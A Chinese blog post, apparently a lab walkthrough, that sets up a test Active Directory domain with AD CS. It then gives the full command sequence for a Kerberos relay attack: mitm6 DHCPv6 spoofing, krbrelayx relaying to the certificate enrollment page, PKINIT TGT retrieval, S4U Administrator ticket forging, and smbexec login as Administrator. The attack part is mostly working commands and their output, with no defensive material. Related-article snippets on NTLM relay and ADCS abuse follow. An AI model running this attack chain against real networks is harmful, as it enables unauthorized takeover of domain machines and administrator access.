kerberos中继攻击

最新推荐文章于 2025-05-09 13:32:42 发布
最新推荐文章于 2025-05-09 13:32:42 发布
阅读量453 收藏 1
点赞数
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ordar123/article/details/130281163
版权

title: kerberos中继攻击
date: 2022-03-11
tags: [‘kerberos’,‘中继’]
copyright: true

环境搭建

  1. DC ip:192.168.21.2 域名:DC.rangenet.com

  2. ADCS ip:192.168.21.3 域名:adcs.rangenet.com

  3. 一台win10域成员 ip:192.168.21.4 域名win10.rangenet.com

  4. 攻击机kali ip:192.168.21.10

DC搭建

选择一台winserver搭建adcs服务,这里是winserver2016。选择Active Directory 域服务,其他默认即可。

图形用户界面, 文本, 应用程序 描述已自动生成

安装完成之后,提升为域控制器,开始配置域控。

添加新林rangenet.com,其他默认,然后一步步到安装。

图形用户界面, 应用程序 描述已自动生成

图形用户界面, 文本, 应用程序, 电子邮件 描述已自动生成

ADCS搭建

选择一台winserver搭建adcs服务,这里是winserver2016。然后先将这台server加入到rangenet.com域中

社交网络的手机截图 描述已自动生成

电脑萤幕的截图 描述已自动生成

重启之后,使用域控账号登录(因为要安装ADCS服务需要登陆账号属于Enterprise Admins组,为了方便这里使用域控账号登录)

图片包含 游戏机, 自然, 夜空 描述已自动生成

下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。

服务器管理器–>添加角色和功能向导–>勾选服务器角色–>Active Director 证书服务

图形用户界面, 应用程序 描述已自动生成

图形用户界面, 应用程序 描述已自动生成

开始安装

图形用户界面, 文本, 应用程序 描述已自动生成

配置ADCS服务,只需要注意下面截图的内容,其他都是默认。

图表 低可信度描述已自动生成

图形用户界面, 文本, 应用程序 描述已自动生成

图形用户界面, 文本, 应用程序 描述已自动生成

图形用户界面, 文本, 应用程序 描述已自动生成

图形用户界面, 应用程序 描述已自动生成

访问http://localhost/certsrv出现登录框

图形用户界面, 应用程序 描述已自动生成

输入系统账号即可进入,出现下面界面,表示安装成功。

图形用户界面, 文本, 应用程序 描述已自动生成

Kerberos中继攻击

Kali中添加域控ip为dns

图形用户界面, 文本, 网站 描述已自动生成

改完后ping一下域成员,能ping通即可

文本 描述已自动生成

开始攻击

使用mitm6监听DHCPV6请求。

Mitm6 –domain rangenet.com –host-allowlist win10.rangenet.com –relay adcs.rangenet.com -v

–domain 是要攻击的域名

–host-allowlist是过滤win10这台机器的请求

–relay是转发请求的地址,这里填adcs地址

图形用户界面, 文本 描述已自动生成

使用krbrelays.py中继kerberos协议.

Pyhton3 krbrelayx.py –target http://adcs.rangenet.com/certsrv/ -ip 192.168.21.10 –victim win10.rangenet.com –adcs –template Machine

–target 是adcs证书服务的url地址

-ip是当前ip(内网中控制的机器,这里把kali直接放在内网中了)

–victim是受害者域名

图形用户界面, 文本 描述已自动生成

然后重启win10,当win10成员机获取网络连接时会发出DHCPv6请求的包,以便mitm6可以接管DHCPv6请求。

文本 描述已自动生成

Krbrelax.py成功中继到证书

文本 描述已自动生成

证书太长,把证书复制到文件里,方便复制全证书

文本 描述已自动生成

接下来使用证书去向域控获取tgt,我们使用gettgtpkinit.py来模拟这个过程。

python gettgtpkinit.py -pfx-base64 一大串证书 rangenet.com/win10$ win10.ccache

文本 描述已自动生成

报下面截图的错是因为时钟问题,DC的时间太落后了,调回正常时间即可。

图形用户界面, 文本 描述已自动生成

下面成功获取到tgt票据

文本 描述已自动生成

接下来请求管理员票据

python gets4uticket.py kerberos+ccache://rangenet.com\win10$:win10.ccache@DC主机名.rangenet.com cifs/win10.rangenet.com@rangenet.com Administrator@rangenet.com admin.ccache

DC主机名在mitm6处理的请求中可以找到

文本 描述已自动生成

图形用户界面, 文本, 网站 描述已自动生成

然后就可以使用管理员票据去登录机器了

KRB5CCNAME=admin.ccache python …/impacket/examples/smbexec.py -k rangenet.com/Administrator@win10.rangenet.com -no-pass

文本 描述已自动生成

NTLM 中继到 LDAP 结合 CVE-2019-1040 接管全域
总有人间一两风,填我十万八千梦
12-25 348
ntlmrelayx.py 将接收的身份验证请求中继到域控制器的 LDAP 服务(192.168.10.2),同时修改域控 2 机器账号的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性为 test$ 的 sid 值。这样,test$ 就可以代表目标机器向 Kerberos 请求服务票据,从而获取域控 2 的权限。
ADCS攻击系列【ESC1-8】详解
总有人间一两风,填我十万八千梦
09-11 585
ADCS(Active Directory Certificate Services),是微软提供的一套证书服务解决方案,用于实现公钥基础结构(PKI)的功能,包括证书的产生、管理、存储、分发和撤销等。ADCS能够与现有的Active Directory Domain Services(ADDS)服务结合,用于加密文件系统、数字签名以及身份验证等多种安全应用场景。在ADCS中,证书颁发机构(CA)扮演着核心角色,负责接收证书申请、验证申请者信息、颁发证书以及管理证书的吊销等。
Kerberos域安全系列(29) NTLM中间人攻击
prettyX的博客
05-19 795
NTLM中间人攻击 NTLM Relay,中间人攻击或重放攻击是一个意思 2001年,最早由Dystic实现,SMBRelay 2004年,发展为HTTP->SMB,BlackHat,未开源 2007年,HTTP->SMB被集成到MetaSploit 2008年,HTTP->HTTP的NTLM攻击被实现(MS08-067) NTLM认证过程 NTLM中间人实验 1、工具 ntlmrelayx.py ,安装命令 pip install ldap3 dnspytho
Krbrelayx:Kerberos 中继与无约束委派滥用工具包
gitblog_00419的博客
08-13 720
Krbrelayx:Kerberos 中继与无约束委派滥用工具包 krbrelayxKerberos unconstrained delegation abuse toolkit项目地址:https://gitcode.com/gh_mirrors/kr/krbrelayx 在网络安全领域,Kerberos 认证系统是企业级网络中广泛使用的安全协议。然而,正如所有技术一样,它也存在潜在的安全风险...
使用krbrelayx和mitm6通过DNS中继Kerbeos
Fly_鹏程万里
05-07 734
文章前言 我喜欢的一件事是当我认为我很好地理解了一个话题,然后有人证明我完全错了。当James Forshaw发表一篇关于Kerberos中继的博客时,或多或少发生了这种情况,这反驳了我几年前不能中继Kerberos的结论. James表明有一些技巧可以使Windows对不同的服务主体名称(SPN)进行身份验证,而不是通常从客户端连接到的主机名派生的名称,这意味着Kerberos并不像我假设的那样完全防中继。这促使我研究了一些替代的滥用路径,包括我几年前研究过但永远无法工作的东西:中继DNS身份验证。当您
【内网安全】横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
今天是几号的博客
04-02 1357
攻击者伪造一个恶意的SMB服务器,当内网中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给 Client2(sqlserver)。Exchange,LLMNR投毒,
探索Windows域安全的新边界:PKINIT Tools深度解析与应用
gitblog_00503的博客
08-20 449
探索Windows域安全的新边界:PKINIT Tools深度解析与应用 PKINITtoolsTools for Kerberos PKINIT and relaying to AD CS项目地址:https://gitcode.com/gh_mirrors/pk/PKINITtools 在信息安全的领域里,每一步微小的创新都可能开启一扇通往新世界的大门。今天,我们将深入探讨一个专为网络安全研...
内网集权系统渗透测试笔记.zip
11-29
Kerberoast.ps1 枚举域SPN服务账号字典枚举 克尔布鲁特 枚举域用户字典枚举 ...Kerberos中继攻击漏洞利用 塞蒂皮 服务证书模板攻击漏洞利用 我的M6 中继攻击漏洞利用 黑色的 Kerberos攻击漏洞利用 红色的 Windows域渗透...
SMB中继——内网渗透
include_voidmain的博客
04-26 3469
0x01 SMB协议 SMB概述: SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。 SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。 SMB使用了NetBIOS的应用程序接口 (ApplicationProgram Interface,简称API),一般端口使用为139,4
有签名和无签名ntlm relay攻击实验的数据包,ntlm relay攻击实验用
10-20
然而,NTLM协议在设计上存在一些缺陷,这些缺陷可被利用来进行NTLM中继攻击(NTLM Relay Attack)。攻击者通过中继攻击,可以在不直接破解密码的情况下,截获和重放认证信息,从而实现对内网的非法访问。 在进行...
内网域中NTLM中继那些事儿
qq_62169455的博客
06-03 1138
Windows的MS-RPRN协议用于打印客户端和服务器之前的通信,默认情况下是启用的。如下图所示,在认证的整个流程中,攻击者充当一个中间人,此时,在客户端的眼中,他就是服务端,而在服务端的眼中,他又是客户端。简单说就是,A登陆了administrator这个账户,我们通过手段拿到A的Net-NTLM Hash后无法直接把这个Hash传递回A,但是如果域内的B也可以通过administrator这个账户登录,那我们可以把从A处获得的Hash传递给B,拿到B处的administrator权限。
域渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7361
Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击。Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
smb中继攻击
cxk
06-13 1192
简单来说就是中间人攻击,窃取凭证 这里简单示范 攻击机 kali 192.168.5.102 靶机 win7 192.168.5.155 kali配置如下 靶机执行 dir \\192.168.5.102\c$ 无法弹回shell,不知道为什么,但已能获取到hash。即可pth 利用较简单,重点是如何进行欺骗。 ...
Chapter 1 Securing Your Server and Network(10):使用扩展保护避免授权中继攻击
MVP黄钊吉(發糞塗牆)
08-04 4906
在客户端和服务器互访过程中,授权是会一直保持,通过验证,可以接受或拒绝连接。
shadow credential攻击的理解与利用
Shanfenglan's blog
08-12 1026
文章目录1. 前言2. 利用逻辑3. 利用条件4. 谁能增添msDS-KeyCredentialLink属性5. 利用过程6. 参考文章 1. 前言 无意中看到的,稍微研究了下,简单理解就是一种另类的权限维持方式。 shadow credential是一个ace属性msDS-KeyCredentialLink。Windows中有一种无密码身份验证的方式叫做PKINIT,它是通过证书进行身份验证的。 2. 利用逻辑 假设我们给Tom账号添加shadow credential后,我们可以通过工具获得一个.pfx
SQL-Relay学习笔记(3)
liuyueyi1995的博客
09-26 654
安全性保障Kerberos 和活动目录(Active Directory)加密认证SQL Relay支持Kerberos加密和认证。 当启用Kerberos和Active Directory加密认证后: SQL Relay客户端和服务器之间的全部通信都会加密 通过了认证用户才可以访问SQL Relay Kerberos应用于Linux,Unix系统,活动目录域用于Windows系统。下面的实例启用
运维守护神——数十万线上机器的守护【门神】
京东科技开发者
12-06 1858
随着京东云业务的飞速发展,其需要管理的物理机、虚机以及各类容器已经达到了数十万之巨,在如此数量如此庞大资源机如何管理的课题面前,京东云意识到必须开发自己的高效、安全、稳定的资源机管理系统,为京东云乃至整个京东集团各项业务的发展提供坚实可靠的后盾,“门神”系统在这种情况下应运而生,并在经过多次京东618、11.11等诸多重大活动的检验后,变得愈发成熟稳定。 “门神”顾名思义,就是守护整个京东资...
MCPHub:一站式MCP服务器聚合平台
wbsu2004的博客
05-07 1599
MCPHub 是一个统一的中心服务器,可针对不同场景将多个 MCP 服务器聚合到单独的可流式传输 HTTP (SSE) 终端节点中。
AI服务器通常会运用在哪些场景当中?
最新发布
wanhengidc的博客
05-09 705
人工智能行业作为现代科技的杰出代表,在多个领域当中发展其强大的应用能力和价值,随之,AI服务器也在各个行业中日益显现出来,为各个行业提供了强大的计算能力和处理能力,帮助企业处理复杂的大规模数据,本文将来探索一下AI服务器通常都会运用在哪些场景当中吧!同时还可以预测金融市场的整体趋势和风险管理,在大规模数据分析方面起着非常重要的作用。AI服务器可以运用在医疗教育当中,用于医学图像分析和基因组学研究等场景中,能够帮助其加速医学研究的速度,并且可以提高医学诊断的准确性,对国家医学领域发展做出一定的贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ordar123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值